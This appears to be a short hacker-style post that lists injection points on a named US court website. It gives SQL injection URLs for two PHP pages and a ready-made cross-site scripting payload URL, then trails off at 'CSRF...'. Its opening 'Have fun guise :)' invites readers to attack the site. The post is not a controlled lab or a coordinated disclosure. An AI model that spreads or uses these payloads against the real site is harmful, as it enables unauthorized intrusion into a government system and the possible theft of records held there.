Have fun guise :)
SQLi:
www2.vaeb.uscourts.gov/oz/index.php?t=tinf&id=2340'
www2.vaeb.uscourts.gov/oz/supporter/print.php?id=[SQLi]
XSS:
http://www2.vaeb.uscourts.gov/oz/index.php?t=kbase&pla=%3Cscript%3Ealert(String.fromCharCode(68,%2097,%20114,%20107,%2045,%2088))%3C/script%3E
CSRF...